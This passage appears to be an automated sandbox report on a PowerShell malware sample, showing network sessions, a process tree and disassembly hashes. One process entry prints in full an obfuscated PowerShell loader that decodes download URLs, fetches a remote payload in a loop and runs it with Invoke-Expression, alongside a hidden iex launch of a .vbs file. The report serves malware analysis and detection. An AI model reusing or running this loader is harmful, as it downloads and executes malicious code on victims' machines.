                                                                                                    2024-12-05 09:46:40 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.649997148.251.114.2334432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:46:45 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.erp-royal-crown.info
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:46:46 UTC238INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1251
                                                                                                    date: Thu, 05 Dec 2024 09:46:45 GMT
                                                                                                    server: LiteSpeed
                                                                                                    2024-12-05 09:46:46 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                                    2024-12-05 09:46:46 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:04:44:38
                                                                                                    Start date:05/12/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1"
                                                                                                    Imagebase:0x7ff6e3d50000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:1
                                                                                                    Start time:04:44:38
                                                                                                    Start date:05/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:3
                                                                                                    Start time:04:44:40
                                                                                                    Start date:05/12/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vh27dw.vbs'"
                                                                                                    Imagebase:0x7ff6e3d50000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:5
                                                                                                    Start time:04:44:54
                                                                                                    Start date:05/12/2024
                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs"
                                                                                                    Imagebase:0x7ff6736b0000
                                                                                                    File size:170'496 bytes
                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:6
                                                                                                    Start time:04:44:54
                                                                                                    Start date:05/12/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. ') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. ');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;"
                                                                                                    Imagebase:0x7ff6e3d50000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:7
                                                                                                    Start time:04:44:54
                                                                                                    Start date:05/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:9
                                                                                                    Start time:04:44:55
                                                                                                    Start date:05/12/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
                                                                                                    Imagebase:0x7ff752660000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD34982026 Relevance: .3, Instructions: 324COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2380731008.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 65cb784f5bc4a9865f1e7d748a1800b365d903533ac23597a92ce8330eb5075d
                                                                                                      • Instruction ID: 9078536b2b46a0c9be0502ed405b7a3221bfe2d5d97c1ea4754f5f22b3b8a29d
                                                                                                      • Opcode Fuzzy Hash: 65cb784f5bc4a9865f1e7d748a1800b365d903533ac23597a92ce8330eb5075d
                                                                                                      • Instruction Fuzzy Hash: E3A13522A0E7C51FE796866C98BA5B53FE0DF57210F1800FFD589CB0E7D9196806D362
                                                                                                      Function 00007FFD34982370 Relevance: .1, Instructions: 126COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2380731008.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0425d953cefef7089ef2f64d4d300a3389d7574970ef60d75741e54074e4e929
                                                                                                      • Instruction ID: 713f98f7cd339ed411fd10d1356c17409adcd82fca560062878826cb9784e89c
                                                                                                      • Opcode Fuzzy Hash: 0425d953cefef7089ef2f64d4d300a3389d7574970ef60d75741e54074e4e929
                                                                                                      • Instruction Fuzzy Hash: 7F417922A4E7C11FE397977888B96A53FE1AF57200B5900EFD5C9CB1E7D918180A9322
                                                                                                      Function 00007FFD349821EA Relevance: .1, Instructions: 87COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2380731008.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 45d49902f494b302a7daf5d59cc13da0b32b23068aed06cd995f22a0accaf908
                                                                                                      • Instruction ID: a3800364b65fca566404fe5c5be2317bb0379ecaaf7ab0c58e82da94f0bd141e
                                                                                                      • Opcode Fuzzy Hash: 45d49902f494b302a7daf5d59cc13da0b32b23068aed06cd995f22a0accaf908
                                                                                                      • Instruction Fuzzy Hash: F621F622F0DA4A0FE7E9A66C94B527462C2FF9631079804BED50CCB19BDD2DFC05A211
                                                                                                      Function 00007FFD34984DFE Relevance: .1, Instructions: 61COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2380731008.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6eb7a5a1ee11190edde86448c368a1aa8fea916f33e23397a9c231117a595921
                                                                                                      • Instruction ID: 1f28104ac8f0799e48800697dd13f320092b44e7bc59da8f8323e4228951d3af
                                                                                                      • Opcode Fuzzy Hash: 6eb7a5a1ee11190edde86448c368a1aa8fea916f33e23397a9c231117a595921
                                                                                                      • Instruction Fuzzy Hash: 31110A31F0E6898FEB95EA5C90E41A87BD2EF5A315B0440BED54CC7187EE199805C310
                                                                                                      Function 00007FFD34984DD4 Relevance: .1, Instructions: 51COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2380731008.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b0e9a591d2b99604ec7a4091748a52f134f4d51b2367e38f6637b8ae4db249d2
                                                                                                      • Instruction ID: d8b6df8e46f3c6d46efc572b6cd0dd6896a587f0edca4cff692009543bbd5470
                                                                                                      • Opcode Fuzzy Hash: b0e9a591d2b99604ec7a4091748a52f134f4d51b2367e38f6637b8ae4db249d2
                                                                                                      • Instruction Fuzzy Hash: FB012032B0E6C44FE791EB6C54A56E9BFA1EF5A214F1400FFC18CD7153D8195845C350
                                                                                                      Function 00007FFD348B3BB5 Relevance: .0, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2380107958.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction ID: 38078e75f18e0b2b8b268dcbf61f41ad26cd845f7fbcb4dcfeb52dd8b227340b
                                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction Fuzzy Hash: BE01A73020CB0C4FD754EF0CE051AA5B3E0FB99320F10052DE58AC3651DA36E882CB41

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FFD348B6161 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2380107958.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L_^
                                                                                                      • API String ID: 0-3811526842
                                                                                                      • Opcode ID: 6f8ad3856a6053ef2794f59b8a0e5ef619934f42eeef8a7ab075e7d6fc7c67a8
                                                                                                      • Instruction ID: 1d111ec29a229f8d153d7c97c36104c1c52c8ab8c0b83e7f79a47e151c9fa71c
                                                                                                      • Opcode Fuzzy Hash: 6f8ad3856a6053ef2794f59b8a0e5ef619934f42eeef8a7ab075e7d6fc7c67a8
                                                                                                      • Instruction Fuzzy Hash: A6D18747B0D6D21FF712576C68B61E63FA09F53225B0D11B7C2D8DA0A3ED5D240BA2A3
                                                                                                      Function 00007FFD348B3EFA Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2380107958.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4
                                                                                                      • API String ID: 0-4088798008
                                                                                                      • Opcode ID: 0ba95cbc569716ddcca801cc1db3b29314c2c724f3a6f4f68171c48ff39e45c1
                                                                                                      • Instruction ID: 68ee537ca2350d9f09854cb17287710033e2118a322ed58cd1e7f95d9d2f9e9f
                                                                                                      • Opcode Fuzzy Hash: 0ba95cbc569716ddcca801cc1db3b29314c2c724f3a6f4f68171c48ff39e45c1
                                                                                                      • Instruction Fuzzy Hash: 20C1B556E0DAC25FF762573858F70E57FE0EF2376470901F6CA94CA1939E4C680BA292
                                                                                                      Function 00007FFD348B2FFA Relevance: .3, Instructions: 298COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2380107958.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e089dde13320264d2150c8eceb9239664a9404acabf7fc4c18f52c05fdf5e324
                                                                                                      • Instruction ID: bc9c770bff3eac11060dade52ca5266d56a00171427850f4bb716b26eb3ba2ec
                                                                                                      • Opcode Fuzzy Hash: e089dde13320264d2150c8eceb9239664a9404acabf7fc4c18f52c05fdf5e324
                                                                                                      • Instruction Fuzzy Hash: 3C91C757B0D6966FE31267BCA8B10EA3FA4DF4337570D02B7D684CA0939DAC28079691

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD34983324 Relevance: .1, Instructions: 125COMMON
                                                                                                      Download Yara Rule
